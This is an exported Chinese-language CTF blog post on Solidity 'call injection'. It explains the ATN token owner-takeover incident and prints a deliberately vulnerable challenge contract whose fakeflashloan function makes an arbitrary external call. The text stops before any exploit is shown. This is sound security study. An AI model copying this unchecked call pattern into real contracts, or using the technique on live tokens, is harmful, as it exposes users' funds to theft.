<!DOCTYPE html><html><head>
      <title>callAttack</title>
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      
      <link rel="stylesheet" href="file:///c:\Users\&#x5C0F;&#x6829;\.vscode\extensions\shd101wyy.markdown-preview-enhanced-0.6.3\node_modules\@shd101wyy\mume\dependencies\katex\katex.min.css">
      
      
      
      
      
      
      
      
      
      <style>
      /**
 * prism.js Github theme based on GitHub's theme.
 * @author Sam Clarke
 */
code[class*="language-"],
pre[class*="language-"] {
  color: #333;
  background: none;
  font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace;
  text-align: left;
  white-space: pre;
  word-spacing: normal;
  word-break: normal;
  word-wrap: normal;
  line-height: 1.4;

  -moz-tab-size: 8;
  -o-tab-size: 8;
  tab-size: 8;

  -webkit-hyphens: none;
  -moz-hyphens: none;
  -ms-hyphens: none;
  hyphens: none;
}

/* Code blocks */
pre[class*="language-"] {
  padding: .8em;
  overflow: auto;
  /* border: 1px solid #ddd; */
  border-radius: 3px;
  /* background: #fff; */
  background: #f5f5f5;
}

/* Inline code */
:not(pre) > code[class*="language-"] {
  padding: .1em;
  border-radius: .3em;
  white-space: normal;
  background: #f5f5f5;
}

.token.comment,
.token.blockquote {
  color: #969896;
}

.token.cdata {
  color: #183691;
}

.token.doctype,
.token.punctuation,
.token.variable,
.token.macro.property {
  color: #333;
}

.token.operator,
.token.important,
.token.keyword,
.token.rule,
.token.builtin {
  color: #a71d5d;
}

.token.string,
.token.url,
.token.regex,
.token.attr-value {
  color: #183691;
}

.token.property,
.token.number,
.token.boolean,
.token.entity,
.token.atrule,
.token.constant,
.token.symbol,
.token.command,
.token.code {
  color: #0086b3;
}

.token.tag,
.token.selector,
.token.prolog {
  color: #63a35c;
}

.token.function,
.token.namespace,
.token.pseudo-element,
.token.class,
.token.class-name,
.token.pseudo-class,
.token.id,
.token.url-reference .token.variable,
.token.attr-name {
  color: #795da3;
}

.token.entity {
  cursor: help;
}

.token.title,
.token.title .token.punctuation {
  font-weight: bold;
  color: #1d3e81;
}

.token.list {
  color: #ed6a43;
}

.token.inserted {
  background-color: #eaffea;
  color: #55a532;
}

.token.deleted {
  background-color: #ffecec;
  color: #bd2c00;
}

.token.bold {
  font-weight: bold;
}

.token.italic {
  font-style: italic;
}


/* JSON */
.language-json .token.property {
  color: #183691;
}

.language-markup .token.tag .token.punctuation {
  color: #333;
}

/* CSS */
code.language-css,
.language-css .token.function {
  color: #0086b3;
}

/* YAML */
.language-yaml .token.atrule {
  color: #63a35c;
}

code.language-yaml {
  color: #183691;
}

/* Ruby */
.language-ruby .token.function {
  color: #333;
}

/* Markdown */
.language-markdown .token.url {
  color: #795da3;
}

/* Makefile */
.language-makefile .token.symbol {
  color: #795da3;
}

.language-makefile .token.variable {
  color: #183691;
}

.language-makefile .token.builtin {
  color: #0086b3;
}

/* Bash */
.language-bash .token.keyword {
  color: #0086b3;
}

/* highlight */
pre[data-line] {
  position: relative;
  padding: 1em 0 1em 3em;
}
pre[data-line] .line-highlight-wrapper {
  position: absolute;
  top: 0;
  left: 0;
  background-color: transparent;
  display: block;
  width: 100%;
}

pre[data-line] .line-highlight {
  position: absolute;
  left: 0;
  right: 0;
  padding: inherit 0;
  margin-top: 1em;
  background: hsla(24, 20%, 50%,.08);
  background: linear-gradient(to right, hsla(24, 20%, 50%,.1) 70%, hsla(24, 20%, 50%,0));
  pointer-events: none;
  line-height: inherit;
  white-space: pre;
}

pre[data-line] .line-highlight:before, 
pre[data-line] .line-highlight[data-end]:after {
  content: attr(data-start);
  position: absolute;
  top: .4em;
  left: .6em;
  min-width: 1em;
  padding: 0 .5em;
  background-color: hsla(24, 20%, 50%,.4);
  color: hsl(24, 20%, 95%);
  font: bold 65%/1.5 sans-serif;
  text-align: center;
  vertical-align: .3em;
  border-radius: 999px;
  text-shadow: none;
  box-shadow: 0 1px white;
}

pre[data-line] .line-highlight[data-end]:after {
  content: attr(data-end);
  top: auto;
  bottom: .4em;
}html body{font-family:"Helvetica Neue",Helvetica,"Segoe UI",Arial,freesans,sans-serif;font-size:16px;line-height:1.6;color:#333;background-color:#fff;overflow:initial;box-sizing:border-box;word-wrap:break-word}html body>:first-child{margin-top:0}html body h1,html body h2,html body h3,html body h4,html body h5,html body h6{line-height:1.2;margin-top:1em;margin-bottom:16px;color:#000}html body h1{font-size:2.25em;font-weight:300;padding-bottom:.3em}html body h2{font-size:1.75em;font-weight:400;padding-bottom:.3em}html body h3{font-size:1.5em;font-weight:500}html body h4{font-size:1.25em;font-weight:600}html body h5{font-size:1.1em;font-weight:600}html body h6{font-size:1em;font-weight:600}html body h1,html body h2,html body h3,html body h4,html body h5{font-weight:600}html body h5{font-size:1em}html body h6{color:#5c5c5c}html body strong{color:#000}html body del{color:#5c5c5c}html body a:not([href]){color:inherit;text-decoration:none}html body a{color:#08c;text-decoration:none}html body a:hover{color:#00a3f5;text-decoration:none}html body img{max-width:100%}html body>p{margin-top:0;margin-bottom:16px;word-wrap:break-word}html body>ul,html body>ol{margin-bottom:16px}html body ul,html body ol{padding-left:2em}html body ul.no-list,html body ol.no-list{padding:0;list-style-type:none}html body ul ul,html body ul ol,html body ol ol,html body ol ul{margin-top:0;margin-bottom:0}html body li{margin-bottom:0}html body li.task-list-item{list-style:none}html body li>p{margin-top:0;margin-bottom:0}html body .task-list-item-checkbox{margin:0 .2em .25em -1.8em;vertical-align:middle}html body .task-list-item-checkbox:hover{cursor:pointer}html body blockquote{margin:16px 0;font-size:inherit;padding:0 15px;color:#5c5c5c;background-color:#f0f0f0;border-left:4px solid #d6d6d6}html body blockquote>:first-child{margin-top:0}html body blockquote>:last-child{margin-bottom:0}html body hr{height:4px;margin:32px 0;background-color:#d6d6d6;border:0 none}html body table{margin:10px 0 15px 0;border-collapse:collapse;border-spacing:0;display:block;width:100%;overflow:auto;word-break:normal;word-break:keep-all}html body table th{font-weight:bold;color:#000}html body table td,html body table th{border:1px solid #d6d6d6;padding:6px 13px}html body dl{padding:0}html body dl dt{padding:0;margin-top:16px;font-size:1em;font-style:italic;font-weight:bold}html body dl dd{padding:0 16px;margin-bottom:16px}html body code{font-family:Menlo,Monaco,Consolas,'Courier New',monospace;font-size:.85em !important;color:#000;background-color:#f0f0f0;border-radius:3px;padding:.2em 0}html body code::before,html body code::after{letter-spacing:-0.2em;content:"\00a0"}html body pre>code{padding:0;margin:0;font-size:.85em !important;word-break:normal;white-space:pre;background:transparent;border:0}html body .highlight{margin-bottom:16px}html body .highlight pre,html body pre{padding:1em;overflow:auto;font-size:.85em !important;line-height:1.45;border:#d6d6d6;border-radius:3px}html body .highlight pre{margin-bottom:0;word-break:normal}html body pre code,html body pre tt{display:inline;max-width:initial;padding:0;margin:0;overflow:initial;line-height:inherit;word-wrap:normal;background-color:transparent;border:0}html body pre code:before,html body pre tt:before,html body pre code:after,html body pre tt:after{content:normal}html body p,html body blockquote,html body ul,html body ol,html body dl,html body pre{margin-top:0;margin-bottom:16px}html body kbd{color:#000;border:1px solid #d6d6d6;border-bottom:2px solid #c7c7c7;padding:2px 4px;background-color:#f0f0f0;border-radius:3px}@media print{html body{background-color:#fff}html body h1,html body h2,html body h3,html body h4,html body h5,html body h6{color:#000;page-break-after:avoid}html body blockquote{color:#5c5c5c}html body pre{page-break-inside:avoid}html body table{display:table}html body img{display:block;max-width:100%;max-height:100%}html body pre,html body code{word-wrap:break-word;white-space:pre}}.markdown-preview{width:100%;height:100%;box-sizing:border-box}.markdown-preview .pagebreak,.markdown-preview .newpage{page-break-before:always}.markdown-preview pre.line-numbers{position:relative;padding-left:3.8em;counter-reset:linenumber}.markdown-preview pre.line-numbers>code{position:relative}.markdown-preview pre.line-numbers .line-numbers-rows{position:absolute;pointer-events:none;top:1em;font-size:100%;left:0;width:3em;letter-spacing:-1px;border-right:1px solid #999;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.markdown-preview pre.line-numbers .line-numbers-rows>span{pointer-events:none;display:block;counter-increment:linenumber}.markdown-preview pre.line-numbers .line-numbers-rows>span:before{content:counter(linenumber);color:#999;display:block;padding-right:.8em;text-align:right}.markdown-preview .mathjax-exps .MathJax_Display{text-align:center !important}.markdown-preview:not([for="preview"]) .code-chunk .btn-group{display:none}.markdown-preview:not([for="preview"]) .code-chunk .status{display:none}.markdown-preview:not([for="preview"]) .code-chunk .output-div{margin-bottom:16px}.scrollbar-style::-webkit-scrollbar{width:8px}.scrollbar-style::-webkit-scrollbar-track{border-radius:10px;background-color:transparent}.scrollbar-style::-webkit-scrollbar-thumb{border-radius:5px;background-color:rgba(150,150,150,0.66);border:4px solid rgba(150,150,150,0.66);background-clip:content-box}html body[for="html-export"]:not([data-presentation-mode]){position:relative;width:100%;height:100%;top:0;left:0;margin:0;padding:0;overflow:auto}html body[for="html-export"]:not([data-presentation-mode]) .markdown-preview{position:relative;top:0}@media screen and (min-width:914px){html body[for="html-export"]:not([data-presentation-mode]) .markdown-preview{padding:2em calc(50% - 457px + 2em)}}@media screen and (max-width:914px){html body[for="html-export"]:not([data-presentation-mode]) .markdown-preview{padding:2em}}@media screen and (max-width:450px){html body[for="html-export"]:not([data-presentation-mode]) .markdown-preview{font-size:14px !important;padding:1em}}@media print{html body[for="html-export"]:not([data-presentation-mode]) #sidebar-toc-btn{display:none}}html body[for="html-export"]:not([data-presentation-mode]) #sidebar-toc-btn{position:fixed;bottom:8px;left:8px;font-size:28px;cursor:pointer;color:inherit;z-index:99;width:32px;text-align:center;opacity:.4}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] #sidebar-toc-btn{opacity:1}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc{position:fixed;top:0;left:0;width:300px;height:100%;padding:32px 0 48px 0;font-size:14px;box-shadow:0 0 4px rgba(150,150,150,0.33);box-sizing:border-box;overflow:auto;background-color:inherit}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc::-webkit-scrollbar{width:8px}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc::-webkit-scrollbar-track{border-radius:10px;background-color:transparent}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc::-webkit-scrollbar-thumb{border-radius:5px;background-color:rgba(150,150,150,0.66);border:4px solid rgba(150,150,150,0.66);background-clip:content-box}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc a{text-decoration:none}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc ul{padding:0 1.6em;margin-top:.8em}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc li{margin-bottom:.8em}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc ul{list-style-type:none}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .markdown-preview{left:300px;width:calc(100% -  300px);padding:2em calc(50% - 457px -  150px);margin:0;box-sizing:border-box}@media screen and (max-width:1274px){html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .markdown-preview{padding:2em}}@media screen and (max-width:450px){html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .markdown-preview{width:100%}}html body[for="html-export"]:not([data-presentation-mode]):not([html-show-sidebar-toc]) .markdown-preview{left:50%;transform:translateX(-50%)}html body[for="html-export"]:not([data-presentation-mode]):not([html-show-sidebar-toc]) .md-sidebar-toc{display:none}
/* Please visit the URL below for more information: */
/*   https://shd101wyy.github.io/markdown-preview-enhanced/#/customize-css */

      </style>
    </head>
    <body for="html-export">
      <div class="mume markdown-preview  ">
      <h1 class="mume-header" id="call%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%88%B7%E9%A2%98%E5%AE%9E%E8%B7%B5">Call&#x6CE8;&#x5165;&#x6F0F;&#x6D1E;&#x5237;&#x9898;&#x5B9E;&#x8DF5;</h1>

<hr>
<pre class="language-text"> author&#xFF1A;&#x7518;&#x8D5E;&#x6829;
</pre>
<h2 class="mume-header" id="%E5%86%99%E5%9C%A8%E5%89%8D%E9%9D%A2">&#x5199;&#x5728;&#x524D;&#x9762;</h2>

<p>&#x5199;&#x672C;&#x6587;&#x662F;&#x4E3A;&#x4E86;&#x603B;&#x7ED3;&#x4E00;&#x4E0B;&#x535A;&#x4E3B;&#x5728;&#x8FD9;&#x4E24;&#x5929;&#x4E2D;&#x505A;&#x4E00;&#x4E2A;&#x9776;&#x573A;&#x9898;&#x76EE;&#x65F6;&#x9047;&#x5230;&#x7684;&#x4E00;&#x4E9B;&#x95EE;&#x9898;&#xFF0C;&#x4EE5;&#x53CA;&#x5BF9;call&#x6CE8;&#x5165;&#x7684;&#x4E00;&#x4E9B;&#x89C1;&#x89E3;&#x3002;</p>
<h2 class="mume-header" id="call%E5%87%BD%E6%95%B0">Call&#x51FD;&#x6570;</h2>

<p>&#x9996;&#x5148;&#x6211;&#x4EEC;&#x5148;&#x4E86;&#x89E3;&#x4E00;&#x4E0B;call&#x51FD;&#x6570;&#xFF1A;<br><br>
&#x5408;&#x7EA6;&#x4E4B;&#x95F4;&#x7684;&#x8C03;&#x7528;&#x6709;2&#x79CD;&#x65B9;&#x5F0F;&#xFF1A; &#x5E95;&#x5C42;&#x7684;call&#x65B9;&#x5F0F;&#x548C; new &#x5408;&#x7EA6;&#x7684;&#x65B9;&#x5F0F;<br><br>
solidity &#x63D0;&#x4F9B;&#x4E86; call()&#x3001;delegatecall()&#x3001;callcode() &#x4E09;&#x4E2A;&#x51FD;&#x6570;&#x6765;&#x5B9E;&#x73B0;&#x5408;&#x7EA6;&#x76F4;&#x63A5;&#x7684;&#x8C03;&#x7528;&#x53CA;&#x4EA4;&#x4E92;&#xFF0C;&#x8FD9;&#x4E9B;&#x51FD;&#x6570;&#x7684;&#x6EE5;&#x7528;&#x5BFC;&#x81F4;&#x4E86;&#x5404;&#x79CD;&#x5B89;&#x5168;&#x98CE;&#x9669;&#x548C;&#x6F0F;&#x6D1E;&#x3002;&#x5728;&#x4F7F;&#x7528;&#x7B2C;&#x4E8C;&#x79CD;&#x65B9;&#x5F0F;&#x65F6;&#xFF0C;&#x5982;&#x679C;&#x5904;&#x7406;&#x4E0D;&#x5F53;&#x5F88;&#x53EF;&#x80FD;&#x4EA7;&#x751F;&#x81F4;&#x547D;&#x7684;&#x6F0F;&#x6D1E; &#x2014;&#x2014; &#x8DE8;&#x5408;&#x7EA6;&#x8C03;&#x7528;&#x6F0F;&#x6D1E;&#xFF0C;&#x4E3B;&#x8981;&#x5C31;&#x662F; call() &#x6CE8;&#x5165;&#x51FD;&#x6570;&#x5BFC;&#x81F4;&#x7684;.</p>
<p>call() &#x51FD;&#x6570;&#x5BF9;&#x67D0;&#x4E2A;&#x5408;&#x7EA6;&#x6216;&#x8005;&#x672C;&#x5730;&#x5408;&#x7EA6;&#x7684;&#x67D0;&#x4E2A;&#x65B9;&#x6CD5;&#x7684;&#x8C03;&#x7528;&#x65B9;&#x5F0F;&#xFF1A;</p>
<ul>
<li><code>&lt;address&gt;.call(&#x65B9;&#x6CD5;&#x9009;&#x62E9;&#x5668;,arg1,arg2,...)</code></li>
<li><code>&lt;address&gt;.call(bytes)</code></li>
</ul>
<blockquote>
<p>&#x7EFC;&#x4E0A;  &#x5408;&#x7EA6;&#x4E4B;&#x95F4;&#x7684;&#x8C03;&#x7528;&#x5EFA;&#x8BAE;&#x7684;&#x65B9;&#x5F0F;&#x662F;&#xFF1A;&#x901A;&#x8FC7;new &#x5408;&#x7EA6;&#xFF0C;&#x901A;&#x8FC7;&#x5408;&#x7EA6;&#x7684;&#x65B9;&#x5F0F;&#x53BB;&#x8C03;&#x7528;&#xFF0C;&#x800C;&#x4E0D;&#x662F;&#x901A;&#x8FC7;call&#x7684;&#x65B9;&#x5F0F;&#x53BB;&#x8C03;&#x7528;&#xFF0C;&#x56E0;&#x4E3A;&#x8FD9;&#x6837;&#x4F1A;&#x5931;&#x53BB;&#x63A7;&#x5236;&#x6743;&#x3002;<br></p>
</blockquote>
<h2 class="mume-header" id="%E6%A1%88%E4%BE%8B%E5%88%86%E6%9E%90">&#x6848;&#x4F8B;&#x5206;&#x6790;</h2>

<p>&#x63A5;&#x4E0B;&#x6765;&#x6211;&#x4EEC;&#x901A;&#x8FC7;&#x4E00;&#x4E2A;call&#x6CE8;&#x5165;&#x653B;&#x51FB;&#x7684;&#x6848;&#x4F8B;&#x6765;&#x66F4;&#x6DF1;&#x5165;&#x7684;&#x4E86;&#x89E3;&#x4E00;&#x4E0B;call&#x51FD;&#x6570;:</p>
<blockquote>
<p>2018&#x5E74;5&#x6708;11&#x65E5;&#x4E2D;&#x5348;&#xFF0C;ATN&#x6280;&#x672F;&#x4EBA;&#x5458;&#x6536;&#x5230;&#x5F02;&#x5E38;&#x76D1;&#x63A7;&#x62A5;&#x544A;&#xFF0C;&#x663E;&#x793A;ATN Token&#x4F9B;&#x5E94;&#x91CF;&#x51FA;&#x73B0;&#x5F02;&#x5E38;&#xFF0C;&#x8FC5;&#x901F;&#x4ECB;&#x5165;&#x540E;&#x53D1;&#x73B0;Token&#x5408;&#x7EA6;&#x7531;&#x4E8E;&#x5B58;&#x5728;&#x6F0F;&#x6D1E;&#x53D7;&#x5230;&#x653B;&#x51FB;&#x3002;</p>
</blockquote>
<p>ATN Token&#x5408;&#x7EA6;&#x91C7;&#x7528;&#x7684;&#x662F;&#x5728;&#x4F20;&#x7EDF;ERC20Token&#x5408;&#x7EA6;&#x57FA;&#x7840;&#x4E0A;&#x7684;&#x6269;&#x5C55;&#x7248;&#x672C;ERC223&#xFF0C;&#x5E76;&#x5728;&#x5176;&#x4E2D;&#x4F7F;&#x7528;&#x4E86; dapphub/ds-auth &#x5E93;&#x3002;<br>
&#x5355;&#x72EC;&#x4F7F;&#x7528; ERC223 &#x6216;&#x8005; ds-auth &#x5E93;&#x65F6;&#xFF0C;&#x5E76;&#x6CA1;&#x6709;&#x4EC0;&#x4E48;&#x95EE;&#x9898;&#xFF0C;&#x4F46;&#x662F;&#x4E24;&#x8005;&#x7ED3;&#x5408;&#x65F6;&#xFF0C;&#x9ED1;&#x5BA2;&#x5229;&#x7528;&#x4E86;&#x56DE;&#x8C03;&#x51FD;&#x6570;&#x56DE;&#x8C03;&#x4E86;setOwner&#x65B9;&#x6CD5;&#xFF0C;&#x4ECE;&#x800C;&#x83B7;&#x5F97;&#x9AD8;&#x7EA7;&#x6743;&#x9650;&#x3002;<br><br>
ERC223&#x8F6C;&#x8D26;&#x4EE3;&#x7801;&#x5982;&#x4E0B;&#xFF1A;<br>
<img src="images/range/exm1.png" alt><br>
&#x9ED1;&#x5BA2;&#x8F6C;&#x8D26;&#x65F6;&#x5728;&#x65B9;&#x6CD5;&#x4E2D;&#x8F93;&#x5165;&#x4E86;&#x4EE5;&#x4E0B;&#x53C2;&#x6570;&#x6210;&#x529F;&#x5B9E;&#x73B0;&#x4E86;&#x653B;&#x51FB;&#xFF1A;<br>
<img src="images/range/exm2.png" alt><br>
&#x8BE5;&#x4EA4;&#x6613;&#x6267;&#x884C;&#x7684;&#x65F6;&#x5019; receiver &#x4F1A;&#x88AB; _to(ATN&#x5408;&#x7EA6;&#x5730;&#x5740;) &#x8D4B;&#x503C;&#xFF0C; ATN &#x5408;&#x7EA6;&#x4F1A;&#x8C03;&#x7528; _custom_fallback &#x5373; DSAuth &#x4E2D;&#x7684; setOwner(adddress) &#x65B9;&#x6CD5;&#xFF0C;&#x800C;&#x6B64;&#x65F6;&#x7684; msg.sender &#x53D8;&#x4E3A; ATN &#x5408;&#x7EA6;&#x5730;&#x5740;&#xFF0C;owner_&#x53C2;&#x6570;&#x4E3A;_from(&#x9ED1;&#x5BA2;&#x5730;&#x5740;)&#x3002;<br><br>
ds-auth&#x5E93;&#x4E2D;setOwner &#x4EE3;&#x7801;&#x5982;&#x4E0B;&#xFF1A;<br>
<img src="images/range/exm3.png" alt><br>
&#x5728;&#x6267;&#x884C; <code>setOwner</code> &#x65F6;&#x4F1A;&#x5148;&#x9A8C;&#x8BC1; auth &#x5408;&#x6CD5;&#x6027;&#xFF0C;&#x800C;&#x6B64;&#x65F6;&#xFF01; msg.sender &#x5C31;&#x662F;ATN&#x7684;&#x5408;&#x7EA6;&#x5730;&#x5740;&#xFF0C;&#x56E0;&#x6B64;&#x5B8C;&#x7F8E;&#x7684;&#x907F;&#x5F00;&#x4E86;auth&#x7684;&#x68C0;&#x67E5;&#x3002;setOwner &#x7684; modifier auth &#x4EE3;&#x7801;&#xFF1A;<br>
<img src="images/range/exm4.png" alt></p>
<blockquote>
<p>&#x603B;&#x7684;&#x6765;&#x8BF4;</p>
</blockquote>
<ol>
<li>Call&#x51FD;&#x6570;&#x81EA;&#x7531;&#x5EA6;&#x8FC7;&#x5927;&#xFF0C;&#x5E94;&#x8C28;&#x614E;&#x4F7F;&#x7528;&#x4F5C;&#x4E3A;&#x5E95;&#x5C42;&#x51FD;&#x6570;&#xFF0C;&#x5BF9;&#x4E8E;&#x4E00;&#x4E9B;&#x654F;&#x611F;&#x64CD;&#x4F5C;&#x6216;&#x8005;&#x6743;&#x9650;&#x5224;&#x65AD;&#x51FD;&#x6570;&#xFF0C;&#x5219;&#x4E0D;&#x8981;&#x8F7B;&#x6613;&#x5C06;&#x5408;&#x7EA6;&#x81EA;&#x8EAB;&#x7684;&#x8D26;&#x6237;&#x5730;&#x5740;&#x4F5C;&#x4E3A;&#x53EF;&#x4FE1;&#x7684;&#x5730;&#x5740;&#x3002;</li>
<li>&#x8C03;&#x7528;&#x7684;&#x51FD;&#x6570;&#x5E94;&#x8BE5;&#x505A;&#x4E25;&#x683C;&#x7684;&#x9650;&#x5236;&#xFF0C;&#x907F;&#x5F00;&#x8C03;&#x7528;&#x4EFB;&#x610F;&#x51FD;&#x6570;&#x7684;&#x9690;&#x60A3;</li>
<li>&#x7528;&#x5230;&#x7C7B;&#x4F3C;ERC223&#x63A8;&#x8350;&#x5B9E;&#x73B0;&#x7684;custom_fallback&#x548C;ds-auth&#x7684;&#x5408;&#x7EA6;&#xFF0C;&#x6216;&#x8005;&#x8BF4;&#x5185;&#x7F6E;&#x6709;&#x5176;&#x4ED6;&#x6743;&#x9650;&#x63A7;&#x5236;&#x5F97;&#x5408;&#x7EA6;&#x7684;&#x4EE5;&#x592A;&#x574A;Token&#xFF0C;&#x5F88;&#x53EF;&#x80FD;&#x4E5F;&#x5B58;&#x5728;&#x8FD9;&#x4E2A;call&#x7684;&#x6CE8;&#x5165;&#x95EE;&#x9898;</li>
</ol>
<h2 class="mume-header" id="%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90">&#x6F0F;&#x6D1E;&#x5206;&#x6790;&#xFF1A;</h2>

<p>&#x901A;&#x8FC7;&#x4EE5;&#x4E0A;&#x7684;&#x4ECB;&#x7ECD;&#xFF0C;&#x60F3;&#x5FC5;&#x5927;&#x5BB6;&#x5BF9;call&#x51FD;&#x6570;&#x4EE5;&#x53CA;&#x5176;&#x6F0F;&#x6D1E;&#x5DF2;&#x7ECF;&#x6709;&#x4E86;&#x81EA;&#x5DF1;&#x7684;&#x7406;&#x89E3;&#x3002;<br><br>
call&#x51FD;&#x6570;&#x51FA;&#x73B0;&#x5728;&#x5E95;&#x5C42;&#x5408;&#x7EA6;&#x4E2D;&#x9700;&#x8981;&#x683C;&#x5916;&#x91CD;&#x89C6;&#xFF0C;&#x5982;&#x975E;&#x5FC5;&#x8981;&#x6700;&#x597D;&#x4E0D;&#x8981;&#x7528;&#xFF0C;&#x7528;new&#x4EE3;&#x66FF;&#x3002;<br><br>
call&#x6CE8;&#x5165;&#x7684;&#x4E3B;&#x8981;&#x653B;&#x51FB;&#x601D;&#x8DEF;&#xFF1A;</p>
<blockquote>
<p>&#x7531;&#x4E8E;call&#x53C2;&#x6570;&#x7C7B;&#x578B;&#x4E0D;&#x9650;&#xFF0C;&#x8FD9;&#x7ED9;&#x4E86;&#x53C2;&#x6570;&#x5F88;&#x5927;&#x7684;&#x81EA;&#x7531;&#x5EA6;&#xFF0C;&#x9ED1;&#x5BA2;&#x53EF;&#x4EE5;&#x901A;&#x8FC7;&#x6784;&#x9020;&#x53C2;&#x6570;&#x53BB;&#x8C03;&#x7528;&#x4E0E;&#x6B64;&#x5408;&#x7EA6;&#x76F8;&#x5173;&#x8054;&#x7684;&#x6240;&#x6709;&#x65B9;&#x6CD5;&#xFF0C;&#x5E76;&#x4E14;&#x5728;&#x8C03;&#x7528;&#x65F6;msg.sender&#x7684;&#x503C;&#x4F1A;&#x53D8;&#x4E3A;&#x5408;&#x7EA6;&#x7684;&#x5730;&#x5740;&#xFF0C;&#x8FD9;&#x53EF;&#x80FD;&#x4F1A;&#x7ED5;&#x8FC7;&#x5173;&#x952E;&#x51FD;&#x6570;&#x7684;&#x4E00;&#x4E9B;&#x5224;&#x65AD;&#x6761;&#x4EF6;&#xFF0C;&#x4ECE;&#x800C;&#x4F7F;&#x9ED1;&#x5BA2;&#x901A;&#x8FC7;&quot;&#x5192;&#x540D;&#x8C03;&#x7528;&quot;&#x83B7;&#x5F97;&#x5229;&#x76CA;&#x3002;</p>
</blockquote>
<h2 class="mume-header" id="%E9%9D%B6%E5%9C%BA%E9%A2%98%E7%9B%AE">&#x9776;&#x573A;&#x9898;&#x76EE;&#xFF1A;</h2>

<p>&#x8BF4;&#x4E86;&#x8FD9;&#x4E48;&#x591A;&#xFF0C;&#x8BA9;&#x6211;&#x4EEC;&#x56DE;&#x5230;&#x95EE;&#x9898;&#x7684;&#x8D77;&#x70B9;&#xFF1A;<br>
&#x6F0F;&#x6D1E;&#x6E90;&#x7801;&#x5982;&#x4E0B;&#xFF1A;</p>
<pre data-role="codeBlock" data-info class="language-"><code>pragma solidity ^0.4.19;
contract Vuln{
    address public owner;
    string public name     = &quot;Chain&quot;;
    string public symbol   = &quot;CHA&quot;;
    uint8  public decimals = 18;
    uint public totalSupply=10000000000;
    bool  public isLoan=false;
    bool public solved;
    event  Approval(address indexed from, address indexed to, uint number);
    event  Transfer(address indexed from, address indexed to, uint number);
    event  Deposit(address indexed to, uint number);
    event  Withdrawal(address indexed from, uint number);

    mapping (address =&gt; uint)                       public  balanceOf;
    mapping (address =&gt; mapping (address =&gt; uint))  public  allowance;
    constructor() public{
        owner=msg.sender;
        balanceOf[owner]=totalSupply/2;
        balanceOf[address(this)]=totalSupply/2;
    }


    function withdraw(uint number) public {
        require(balanceOf[msg.sender] &gt;= number);
        balanceOf[msg.sender] -= number;
        (msg.sender).transfer(number);
        emit Withdrawal(msg.sender, number);
    }


    function approve(address to, uint number) public returns (bool) {
        allowance[msg.sender][to] = number;
        emit Approval(msg.sender, to, number);
        return true;
    }

    function transfer(address _to, uint _value) public returns (bool) {
        require(balanceOf[msg.sender] - _value &gt;= 0);
        balanceOf[msg.sender] -= _value;
        balanceOf[_to] += _value;
    return true;
    }

    function fakeflashloan(uint256 value,address target,bytes memory data) public{
        require(isLoan==false&amp;&amp;value&gt;=0&amp;&amp;value&lt;=1000);
        balanceOf[address(this)]-=value;
        balanceOf[target]+=value;

        address(target).call(data);

        isLoan=true;
        require(balanceOf[target]&gt;=value);
        balanceOf[address(this)]+=value;
        balanceOf[target]-=value;
        isLoan=false;
    }

    function transferFrom(address from, address to, uint number)
        public
        returns (bool)
    {
        require(balanceOf[from] &gt;= number);

        if (from != msg.sender &amp;&amp; allowance[from][msg.sender] != 2**256-1) {
            require(allowance[from][msg.sender] &gt;= number);
            allowance[from][msg.sender] -= number;
        }

        balanceOf[from] -= number;
        balanceOf[to] += number;

        emit Transfer(from, to, number);

        return true;
    }
    function isSolved() public returns(bool){
        return solved;
    }

    function complete() public {

        require(balanceOf[msg.sender]&gt;10000);
        require(allowance[address(this)][msg.sender]&gt;10000);
        solved=true;

    }
}
</code></pre><p><strong>&#x62FF;&#x5230;flag&#x7684;&#x8981;&#x6C42;&#x662F;&#x4F7F;isSolved()&#x8FD4;&#x56DE;true</strong><br>
&#x8BFB;&#x5B8C;&#x6E90;&#x7801;&#x540E;&#xFF0C;&#x53D1;&#x73B0;&#x9898;&#x76EE;&#x8981;&#x6211;&#x4EEC;&#x901A;&#x8FC7;&#x653B;&#x51FB;&#x8FBE;&#x6210;<code>complete()</code>&#x51FD;&#x6570;&#x91CC;&#x7684;&#x4E24;&#x4E2A;&#x9650;&#x5236;&#x6761;&#x4EF6;:</p>
<pre data-role="codeBlock" data-info class="language-"><code> function complete() public {

        require(balanceOf[msg.sender]&gt;10000);
        require(allowance[address(this)][msg.sender]&gt;10000);
        solved=true;

 }
</code></pre><p>&#x5373;&#x662F;&#x8BA9;&#x6211;&#x4EEC;&#x5229;&#x7528;&#x6F0F;&#x6D1E;&#x4ECE;&#x5408;&#x7EA6;&#x6210;&#x529F;&#x76D7;&#x53D6;10000&#x4EE5;&#x4E0A;&#x7684;token<br><br>
